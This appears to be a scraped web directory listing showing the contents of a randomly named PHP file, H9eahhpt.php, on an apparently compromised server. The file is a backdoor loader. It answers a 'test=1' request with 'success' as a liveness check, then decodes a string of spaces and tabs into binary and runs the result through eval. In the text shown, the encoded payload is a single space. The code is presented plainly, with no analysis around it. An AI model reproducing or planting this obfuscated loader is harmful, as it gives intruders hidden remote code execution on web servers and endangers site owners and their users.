| .. | |||||
| a | |||||
| b | |||||
| c | |||||
| d | |||||
| e | |||||
| f | |||||
| g | |||||
| h | |||||
| H9eahhpt.php |
<?php
if ($_SERVER['REQUEST_METHOD'] == 'GET') {
if($_GET['test']==1) {
echo 'success';die();
}
}
$dispatcher = " ";
$factory = str_replace([" ", "\t"], ['0', '1'], $dispatcher);
$app = '';
$event = str_split($factory, 8);
foreach($event as $context) { $app .= chr(bindec($context)); }
eval('?>' . $app);
| .. | |||||
| a | |||||
| b | |||||
| c | |||||
| d | |||||
| e | |||||
| f | |||||
| g | |||||
| h | |||||
| H9eahhpt.php |